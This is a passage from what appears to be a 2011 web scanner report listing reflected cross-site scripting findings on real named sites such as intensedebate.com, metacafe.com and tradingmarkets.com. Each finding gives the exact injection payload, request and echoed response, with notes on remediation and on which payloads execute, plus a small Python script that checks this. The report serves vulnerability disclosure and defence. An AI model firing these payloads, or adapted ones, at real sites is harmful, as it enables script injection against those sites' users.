GET /wCSS.php789e9'><script>alert(1)</script>85dc5a2562a?widget=1 HTTP/1.1
Host: www.intensedebate.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx
Date: Mon, 31 Jan 2011 19:48:04 GMT
Content-Type: text/html; charset=utf-8
Connection: close
Vary: Accept-Encoding
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Length: 4801

   <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
   <html xmlns="http://www.w3.org/1999/xhtml">
   <head>
   <meta http-equiv="Conte
...[SNIP]...
<script type='text/javascript' src='http://wordpress.com/remote-login.php?action=js&id=120742&host=intensedebate.com&back=http://intensedebate.com/wCSS.php789e9'><script>alert(1)</script>85dc5a2562a?widget=1'>
...[SNIP]...

1.277. http://www.intensedebate.com/wCSS.php [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.intensedebate.com
Path:   /wCSS.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 46cb9'><script>alert(1)</script>c2c05cf5f6b was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

Same context as 1.272: the reflection sits in the src attribute of a <script> element, so the payload's <script>alert(1)</script> becomes the ignored inline body of that element and does not execute as written; a payload that first closes the element with '></script> does.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /wCSS.php/46cb9'><script>alert(1)</script>c2c05cf5f6b HTTP/1.1
Host: www.intensedebate.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx
Date: Mon, 31 Jan 2011 19:48:04 GMT
Content-Type: text/html; charset=utf-8
Connection: close
Vary: Accept-Encoding
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Length: 4788

   <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
   <html xmlns="http://www.w3.org/1999/xhtml">
   <head>
   <meta http-equiv="Conte
...[SNIP]...
<script type='text/javascript' src='http://wordpress.com/remote-login.php?action=js&id=120742&host=intensedebate.com&back=http://intensedebate.com/wCSS.php/46cb9'><script>alert(1)</script>c2c05cf5f6b'>
...[SNIP]...

1.278. http://www.intensedebate.com/widgets/acctComment/22911/5 [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.intensedebate.com
Path:   /widgets/acctComment/22911/5

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 95558'><script>alert(1)</script>e7b8f6dac6f was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

Same context as 1.272: the reflection sits in the src attribute of a <script> element, so the payload's <script>alert(1)</script> becomes the ignored inline body of that element and does not execute as written; a payload that first closes the element with '></script> does.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /widgets95558'><script>alert(1)</script>e7b8f6dac6f/acctComment/22911/5 HTTP/1.1
Host: www.intensedebate.com
Proxy-Connection: keep-alive
Referer: http://www.scmagazineuk.com/microsoft-warns-of-internet-explorer-xss-flaw-in-all-versions-of-windows/article/195310/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: nginx
Date: Mon, 31 Jan 2011 17:16:16 GMT
Content-Type: text/html; charset=utf-8
Connection: close
Vary: Accept-Encoding
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Length: 4721

   <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
   <html xmlns="http://www.w3.org/1999/xhtml">
   <head>
   <meta http-equiv="Conte
...[SNIP]...
<script type='text/javascript' src='http://wordpress.com/remote-login.php?action=js&id=120742&host=intensedebate.com&back=http://intensedebate.com/widgets95558'><script>alert(1)</script>e7b8f6dac6f/acctComment/22911/5'>
...[SNIP]...

1.279. http://www.intensedebate.com/widgets/acctComment/22911/5 [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.intensedebate.com
Path:   /widgets/acctComment/22911/5

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload f237b'><script>alert(1)</script>fc6d197e1bd was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

Same context as 1.272: the reflection sits in the src attribute of a <script> element, so the payload's <script>alert(1)</script> becomes the ignored inline body of that element and does not execute as written; a payload that first closes the element with '></script> does.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /widgets/acctComment/22911f237b'><script>alert(1)</script>fc6d197e1bd/5 HTTP/1.1
Host: www.intensedebate.com
Proxy-Connection: keep-alive
Referer: http://www.scmagazineuk.com/microsoft-warns-of-internet-explorer-xss-flaw-in-all-versions-of-windows/article/195310/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: nginx
Date: Mon, 31 Jan 2011 17:16:16 GMT
Content-Type: text/html; charset=utf-8
Connection: close
Vary: Accept-Encoding
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Length: 4548

   <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
   <html xmlns="http://www.w3.org/1999/xhtml">
   <head>
   <meta http-equiv="Conte
...[SNIP]...
<script type='text/javascript' src='http://wordpress.com/remote-login.php?action=js&id=120742&host=intensedebate.com&back=http://intensedebate.com/widgets/acctComment/22911f237b'><script>alert(1)</script>fc6d197e1bd/5'>
...[SNIP]...

1.280. http://www.metacafe.com/fplayer/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.metacafe.com
Path:   /fplayer/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 10930"><script>alert(1)</script>2d2f8737db1 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /fplayer/?10930"><script>alert(1)</script>2d2f8737db1=1 HTTP/1.1
Host: www.metacafe.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
P3P: CP="NOI CUR ADM OUR NOR STA NID"
Content-Type: text/html
Date: Mon, 31 Jan 2011 19:48:50 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: PHPSESSID=7347ca3a3b398ab9162a6261e64237aa; path=/; domain=.metacafe.com
Set-Cookie: OAGEO=US%7CTX%7CDallas%7C75207%7C32.7825%7C-96.8207%7C623%7C214%7C%7C%7C; path=/; domain=.metacafe.com
Set-Cookie: OAID=78ad65ba0c32312571a1c4541d30a631; expires=Tue, 31-Jan-2012 19:48:50 GMT; path=/; domain=.metacafe.com
Set-Cookie: User=%7B%22sc%22%3A1%2C%22visitID%22%3A%2231e27294d7040f6bdcf7fb72e1dfbb3b%22%2C%22LEID%22%3A23%2C%22LangID%22%3A%22en%22%2C%22npUserLocations%22%3A%5B244%5D%2C%22npUserLanguages%22%3A%5B9%5D%2C%22pve%22%3A1%7D; expires=Sat, 30-Jan-2016 19:48:50 GMT; path=/; domain=.metacafe.com
Set-Cookie: dsavip=3417313452.20480.0000; expires=Mon, 31-Jan-2011 20:48:50 GMT; path=/
Content-Length: 113548

           <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
           <html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.faceboo
...[SNIP]...
<link rel="alternate" type="application/rss+xml" title="Metacafe - Online Video Entertainment - Free video clips for your enjoyment" href="/fplayer/rss.xml?10930"><script>alert(1)</script>2d2f8737db1=1" />
...[SNIP]...
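Findings 1.270, 1.272 and 1.280 look alike in the scanner output but differ in whether the proof of concept actually runs: a backslash-escaped quote still closes an HTML attribute (1.270), a payload reflected inside the src attribute of a <script> element ends up as that element's ignored inline text (1.272), and a breakout from a void <link> element yields a fresh, executable <script> (1.280). The following script, added to this report and not part of the scanner's output or of any listed site's code, replays response fragments constructed from those three findings through Python's html.parser, which treats script content as raw text up to the first </script> the way a browser tokenizer does, and reports which fragments produce an executable inline script element. It is a tokenizer-level check only; tree-construction rules such as the HTML5 frameset insertion mode are not modelled, so the .tv frameset findings below still need a browser.

```python
"""Does a reflected-XSS proof of concept really yield an executable inline <script>?

Added example for this report; not scanner output and not code from any listed site.
Tokenizer-level check built on the standard library's html.parser."""
from html.parser import HTMLParser

# Response fragments constructed from findings 1.270, 1.272 and 1.280 on this page.
SNIPPETS = {
    # Backslash-escaped quote: the "\" is literal in HTML, the quote still closes the
    # attribute, and a real <script> element follows.
    "1.270 installsoftware.com": (
        r'<input name="u" id="url" value="http://www.installsoftware.com/wp-content/'
        r'themes/rt_mynxx_wp/js/rokutils.js5e316\"><script>alert(1)</script>'
        r'78d1f3e19ac" type="hidden" />'
    ),
    # Reflection inside the src attribute of a <script>: the payload text becomes the
    # inline body of an element that has src, and browsers ignore that body.
    "1.272 intensedebate.com": (
        "<script type='text/javascript' src='http://wordpress.com/remote-login.php?"
        "action=js&id=120742&host=intensedebate.com&back=http://intensedebate.com/"
        "?c9021'><script>alert(1)</script>47ba7e7544c=1'>"
    ),
    # <link> is a void element; "> closes it and a fresh <script> element follows.
    "1.280 metacafe.com": (
        '<link rel="alternate" type="application/rss+xml" title="Metacafe" '
        'href="/fplayer/rss.xml?10930"><script>alert(1)</script>2d2f8737db1=1" />'
    ),
}


class ScriptAudit(HTMLParser):
    """Records every <script> element with its attributes and raw inline text.

    html.parser switches to CDATA mode after a <script ...> start tag, so the text up
    to the first </script> arrives in handle_data untouched, as in a browser."""

    def __init__(self):
        super().__init__(convert_charrefs=True)
        self.scripts = []
        self._current = None

    def handle_starttag(self, tag, attrs):
        if tag == "script":
            self._current = {"attrs": dict(attrs), "text": ""}
            self.scripts.append(self._current)

    def handle_data(self, data):
        if self._current is not None:
            self._current["text"] += data

    def handle_endtag(self, tag):
        if tag == "script":
            self._current = None


def executable_inline_scripts(html, marker):
    """Return the inline script bodies containing `marker` that a browser would run.

    An element with a src attribute loads that URL and ignores its inline text, so a
    marker found there does not count."""
    audit = ScriptAudit()
    audit.feed(html)
    audit.close()
    return [s["text"] for s in audit.scripts
            if "src" not in s["attrs"] and marker in s["text"]]


def audit_findings(snippets=SNIPPETS, marker="alert(1)"):
    """Map each finding to True if its PoC produces an executable script element."""
    return {name: bool(executable_inline_scripts(html, marker))
            for name, html in snippets.items()}


if __name__ == "__main__":
    for name, fires in audit_findings().items():
        print(name, "executes as written" if fires else "does NOT execute as written")
```

Run directly, the script reports 1.270 and 1.280 as executing and 1.272 as not; feeding it the adjusted payload '></script><script>alert(1)</script> for the 1.272 pattern shows the closed-element variant does produce an executable script, which is the check to run before rating a scanner PoC "Certain".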

1.281. http://www.paloaltonetworks.com/literature/forms/ebook/index.php [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.paloaltonetworks.com
Path:   /literature/forms/ebook/index.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8945b"><script>alert(1)</script>8e16c641989 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /literature/forms/ebook/index.php?8945b"><script>alert(1)</script>8e16c641989=1 HTTP/1.1
Host: www.paloaltonetworks.com
Proxy-Connection: keep-alive
Referer: http://whitepapers.scmagazineuk.com/astaro
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Mon, 31 Jan 2011 17:17:51 GMT
Server: Apache/2.0.59 (Win32) mod_ssl/2.0.59 OpenSSL/0.9.8e PHP/5.2.4
X-Powered-By: PHP/5.2.4
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 25178

<!DOCTYPE html>


<html lang="en">
<head>
   <meta http-equiv="Content-Type" content="text/html; charset=utf-8">
   <meta name="generator" content="Dreamweaver">
   <meta name="author" content="C. W. Miller
...[SNIP]...
<a href="http://www.facebook.com/sharer.php?u=http://www.paloaltonetworks.com/literature/forms/ebook/index.php?8945b"><script>alert(1)</script>8e16c641989=1" title="Facebook" target="_blank">
...[SNIP]...

1.282. http://www.scstudio.tv/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.scstudio.tv
Path:   /

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 492ad"><script>alert(1)</script>3cc772e43c4 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

Caveat on the proof of concept: the attribute is the src of a <frame> inside a <frameset>. In the HTML5 "in frameset" insertion mode a <script> start tag, and the text that follows it, is a parse error and is ignored, so the payload is not expected to execute as written in a current browser (pre-HTML5 parsers may behave differently). The injection point is still live: the "> closes the frame tag and an attacker can add further <frame> elements with a src of their choosing, so the reflected query string must be HTML-encoded or not echoed at all.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /?492ad"><script>alert(1)</script>3cc772e43c4=1 HTTP/1.1
Host: www.scstudio.tv
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 31 Jan 2011 19:59:49 GMT
Content-Length: 185
Content-Type: text/html
X-Powered-By: Servlet/2.4 JSP/2.0

<html><head><title>scstudio.tv</title></head><frameset><frame src="http://www.scmagazineuk.com/SC-Studio/section/1096/?492ad"><script>alert(1)</script>3cc772e43c4=1"></frameset></html>

1.283. http://www.scstudio.tv/favicon.ico [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.scstudio.tv
Path:   /favicon.ico

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c42a3"><script>alert(1)</script>58e8c224440 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

As in 1.282, the reflection is the src of a <frame> inside a <frameset>: an HTML5 parser ignores a <script> start tag in frameset mode, so the payload is not expected to execute as written in a current browser, but the "> still closes the frame tag and further <frame> elements can be injected. Note that the servlet answers any path, including /favicon.ico, with the same frameset page.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /favicon.ico?c42a3"><script>alert(1)</script>58e8c224440=1 HTTP/1.1
Host: www.scstudio.tv
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Mon, 31 Jan 2011 21:17:50 GMT
Content-Length: 185
Content-Type: text/html
X-Powered-By: Servlet/2.4 JSP/2.0

<html><head><title>scstudio.tv</title></head><frameset><frame src="http://www.scmagazineuk.com/SC-Studio/section/1096/?c42a3"><script>alert(1)</script>58e8c224440=1"></frameset></html>

1.284. http://www.scvision.tv/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.scvision.tv
Path:   /

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload bf8f1"><script>alert(1)</script>86b592bf9bb was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

As in 1.282, the reflection is the src of a <frame> inside a <frameset>: an HTML5 parser ignores a <script> start tag in frameset mode, so the payload is not expected to execute as written in a current browser, but the "> still closes the frame tag and further <frame> elements can be injected.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /?bf8f1"><script>alert(1)</script>86b592bf9bb=1 HTTP/1.1
Host: www.scvision.tv
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 31 Jan 2011 19:59:52 GMT
Content-Length: 185
Content-Type: text/html
X-Powered-By: Servlet/2.4 JSP/2.0

<html><head><title>scvision.tv</title></head><frameset><frame src="http://www.kinura.com/sc_vision_demo/sc_vision.html?bf8f1"><script>alert(1)</script>86b592bf9bb=1"></frameset></html>

1.285. http://www.scwebcasts.tv/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.scwebcasts.tv
Path:   /

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ad1ec"><script>alert(1)</script>ed9539700ba was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

As in 1.282, the reflection is the src of a <frame> inside a <frameset>: an HTML5 parser ignores a <script> start tag in frameset mode, so the payload is not expected to execute as written in a current browser, but the "> still closes the frame tag and further <frame> elements can be injected.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /?ad1ec"><script>alert(1)</script>ed9539700ba=1 HTTP/1.1
Host: www.scwebcasts.tv
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 31 Jan 2011 19:59:50 GMT
Content-Length: 188
Content-Type: text/html
X-Powered-By: Servlet/2.4 JSP/2.0

<html><head><title>scwebcasts.tv</title></head><frameset><frame src="http://www.scmagazineuk.com/SC-Webcast/section/1095/?ad1ec"><script>alert(1)</script>ed9539700ba=1"></frameset></html>

1.286. http://www.technewsworld.com/mwjson/ [action parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.technewsworld.com
Path:   /mwjson/

Issue detail

The value of the action request parameter is copied unencoded into the url member of a JSON response body. The payload aa27e<script>alert(1)</script>e5b239a3869 was submitted in the action parameter. This input was echoed unmodified in the application's response.

The body is JSON, not an HTML document, but it is served with Content-Type: text/html; charset=ISO-8859-1, so a browser sent to this URL directly parses it as HTML and executes the injected <script>. The request shown carries the X-Requested-With: XMLHttpRequest header copied from the page's own XHR call; whether the server also answers without it, which a link-based attack would need, should be checked. The fix is to serve the endpoint as application/json with X-Content-Type-Options: nosniff and to write < as \u003c in the JSON output.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /mwjson/?layout=json&p=www.technewsworld.com&query=industries%3DBIM%2CCPR%2CHRD%2CNET%2CSTW%2CCSE%2CECM%2CECP%2CEDA%2CGAM%2CGRE%2CEPM%2CMEN%2CMLM%2CNAN%2CPEL%2CRFI%2CSWB%2CSEM%2CSMD%2CTLS%2CTCS%2CTEQ%2CVIP%2CWEB%2CWIC%26subjects!%3DACC%2CTNM%2CBCY%2CRTG%2CBFA%2CCCA%2CCON%2CCXP%2CDIV%2CERN%2CERP%2CECO%2CFNC%2CINO%2CJVN%2COFR%2CDSC%2CPER%2CRCL%2CRLE%2CRCN%2CSLS%2CSRP%2CSBS%2CSTS%2CVEN&action=http://www.technewsworld.com/prnewswire/aa27e<script>alert(1)</script>e5b239a3869 HTTP/1.1
Host: www.technewsworld.com
Proxy-Connection: keep-alive
Referer: http://www.technewsworld.com/story/Okta-Offers-Cloud-Crazy-Enterprises-a-Master-Key-71751.html?wlc=1296491477
X-Prototype-Version: 1.6.0.3
X-Requested-With: XMLHttpRequest
Accept: text/javascript, text/html, application/xml, text/xml, */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: WLC=1; Apache=173.193.214.243.95171296491477530; __utmz=1.1296491509.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=1.839503550.1296491509.1296491509.1296491509.1; __utmc=1; __utmb=1.1.10.1296491509; __qca=P0-589233748-1296491508777; __unam=739ad65-12ddceaf87d-6836b603-1

Response

HTTP/1.1 200 OK
Server: nginx/0.7.65
Date: Mon, 31 Jan 2011 17:19:19 GMT
Content-Type: text/html; charset=ISO-8859-1
Connection: keep-alive
Cache-Control: max-age=60
Expires: Mon, 31 Jan 2011 17:17:13 GMT
P3P: CP="ALL DSP COR DEVa TAIa OUR IND DEM"
Content-Length: 6749


   {
       "headlines" : [
   
   {
       "url" : "http://www.technewsworld.com/prnewswire/aa27e<script>alert(1)</script>e5b239a3869?prnewsid=201101311214PR_NEWS_USPR_____DE38978&query=industries%3DBIM%2CCPR%2CHRD%2CNET%2CSTW%2CCSE%2CECM%2CECP%2CEDA%2CGAM%2CGRE%2CEPM%2CMEN%2CMLM%2CNAN%2CPEL%2CRFI%2CSWB%2CSEM%2CSMD%2CTLS%2CTCS%2CTEQ
...[SNIP]...

1.287. http://www.tradingmarkets.com/news/stock-alert/forr_veracode-unveils-details-of-webinar-no-more-excuses-end-cross-site-scripting-now--1455558.html/x26amp [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.tradingmarkets.com
Path:   /news/stock-alert/forr_veracode-unveils-details-of-webinar-no-more-excuses-end-cross-site-scripting-now--1455558.html/x26amp

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 85f11"-alert(1)-"96baa1eb807 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. Where it cannot be avoided, emit the value as a JSON-encoded JavaScript string literal with <, > and & additionally written as \u00XX escapes: escaping quotes alone is not enough, because the HTML parser ends the script element at the first </script> sequence regardless of JavaScript string syntax. Here the value is the request URL itself, reflected into the _trackPageview() argument of the site's 404 page, which is served with a 200 status.

Request

GET /news85f11"-alert(1)-"96baa1eb807/stock-alert/forr_veracode-unveils-details-of-webinar-no-more-excuses-end-cross-site-scripting-now--1455558.html/x26amp HTTP/1.1
Host: www.tradingmarkets.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 31 Jan 2011 20:07:50 GMT
Server: Apache
Set-Cookie: TestCookie=test
Cache-Control: max-age=1
Expires: Mon, 31 Jan 2011 20:07:51 GMT
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 23279

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<title>Online Stock Trading Investing Day Trading | TradingMarkets.com </t
...[SNIP]...
rue);
pageTracker._setAllowHash(false);
pageTracker._link();
pageTracker._linkByPost();
pageTracker._trackPageview("/404.html?page=http://www.tradingmarkets.com/news85f11"-alert(1)-"96baa1eb807/stock-alert/forr_veracode-unveils-details-of-webinar-no-more-excuses-end-cross-site-scripting-now--1455558.html/x26amp&from=");
}
catch(err) {}
</script>
...[SNIP]...

1.288. http://www.tradingmarkets.com/news/stock-alert/forr_veracode-unveils-details-of-webinar-no-more-excuses-end-cross-site-scripting-now--1455558.html/x26amp [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.tradingmarkets.com
Path:   /news/stock-alert/forr_veracode-unveils-details-of-webinar-no-more-excuses-end-cross-site-scripting-now--1455558.html/x26amp

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload c2f54"-alert(1)-"d9931fb932 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. Where it cannot be avoided, emit the value as a JSON-encoded JavaScript string literal with <, > and & additionally written as \u00XX escapes; escaping quotes alone does not stop a </script> sequence from ending the element.

Request

GET /news/stock-alertc2f54"-alert(1)-"d9931fb932/forr_veracode-unveils-details-of-webinar-no-more-excuses-end-cross-site-scripting-now--1455558.html/x26amp HTTP/1.1
Host: www.tradingmarkets.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 31 Jan 2011 20:07:51 GMT
Server: Apache
Set-Cookie: TestCookie=test
Cache-Control: max-age=1
Expires: Mon, 31 Jan 2011 20:07:52 GMT
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 23240

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<title>Online Stock Trading Investing Day Trading | TradingMarkets.com </t
...[SNIP]...
pageTracker._setAllowHash(false);
pageTracker._link();
pageTracker._linkByPost();
pageTracker._trackPageview("/404.html?page=http://www.tradingmarkets.com/news/stock-alertc2f54"-alert(1)-"d9931fb932/forr_veracode-unveils-details-of-webinar-no-more-excuses-end-cross-site-scripting-now--1455558.html/x26amp&from=");
}
catch(err) {}
</script>
...[SNIP]...

1.289. http://www.tradingmarkets.com/news/stock-alert/forr_veracode-unveils-details-of-webinar-no-more-excuses-end-cross-site-scripting-now--1455558.html/x26amp [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.tradingmarkets.com
Path:   /news/stock-alert/forr_veracode-unveils-details-of-webinar-no-more-excuses-end-cross-site-scripting-now--1455558.html/x26amp

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 444ee"-alert(1)-"afb478660f1 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /news/stock-alert/forr_veracode-unveils-details-of-webinar-no-more-excuses-end-cross-site-scripting-now--1455558.html444ee"-alert(1)-"afb478660f1/x26amp HTTP/1.1
Host: www.tradingmarkets.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 31 Jan 2011 20:07:52 GMT
Server: Apache
Set-Cookie: TestCookie=test
Cache-Control: max-age=1
Expires: Mon, 31 Jan 2011 20:07:53 GMT
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 23241

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<title>Online Stock Trading Investing Day Trading | TradingMarkets.com </t
...[SNIP]...
pageTracker._trackPageview("/404.html?page=http://www.tradingmarkets.com/news/stock-alert/forr_veracode-unveils-details-of-webinar-no-more-excuses-end-cross-site-scripting-now--1455558.html444ee"-alert(1)-"afb478660f1/x26amp&from=");
}
catch(err) {}
</script>
...[SNIP]...

1.290. http://www.tradingmarkets.com/news/stock-alert/forr_veracode-unveils-details-of-webinar-no-more-excuses-end-cross-site-scripting-now--1455558.html/x26amp [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.tradingmarkets.com
